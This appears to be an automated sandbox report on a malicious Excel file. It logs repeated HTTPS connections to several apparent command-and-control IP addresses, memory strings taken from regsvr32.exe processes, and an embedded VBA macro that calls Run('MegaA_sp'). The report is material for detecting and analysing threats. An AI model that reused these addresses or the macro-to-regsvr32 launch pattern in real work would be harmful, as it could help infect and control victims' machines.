Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49190 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49194 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49198 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49202 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49211 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49214 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49220 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49229 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49235 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49237 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49239 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49247 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49250 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49251 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49259 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49263 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49265 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49275 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49281 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49282 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49298 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49300 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49307 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49314 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49318 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49319 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49320 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown	TCP traffic detected without corresponding DNS query: 194.225.58.214

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A64C1FA3.emf

Jump to behavior

Source: global traffic

Source: regsvr32.exe, 00000006.00000002.2433177539.0000000000369000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comF equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2433177539.0000000000369000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: qsf.surfescape.net

Source: regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp	String found in binary or memory: http://crl.co
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabEK
Source: regsvr32.exe, 00000011.00000002.2492560886.000000000053C000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabb
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enL
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enU
Source: regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enn
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000002.00000002.2105222828.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2120262017.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2121003757.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2458603358.0000000001DA0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2510481818.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2253344660.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 0000000F.00000002.2253526662.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2440450809.0000000001CB0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/
Source: regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/C
Source: regsvr32.exe, 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/P
Source: regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/X
Source: regsvr32.exe, 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/Y
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100/_
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100:3786/
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100:3786/&
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100:3786/XE
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100:3786/hy
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://211.110.44.63/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://211.110.44.63:5353/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://211.110.44.63:5353/8
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140/M
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140/T
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/7
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/C
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/JE
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/hy
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49302
Source: unknown	Network traffic detected: HTTP traffic on port 49265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49300
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 49294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49265
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49298
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49251
Source: unknown	Network traffic detected: HTTP traffic on port 49319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49294
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49281
Source: unknown	Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49318
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49239
Source: unknown	Network traffic detected: HTTP traffic on port 49250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49275
Source: unknown	Network traffic detected: HTTP traffic on port 49300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49307
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49228

Source: unknown	HTTPS traffic detected: 64.37.52.172:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.83.81.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.136.54.91:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.224.50:443 -> 192.168.2.22:49191 version: TLS 1.2

System Summary:

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function Print_Sheet_MAin, API Run("MegaA_sp")			Name: Print_Sheet_MAin
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function Print_Sheet_MAin, API Run("MegaA_sp")			Name: Print_Sheet_MAin

Document contains an embedded VBA macro with suspicious strings

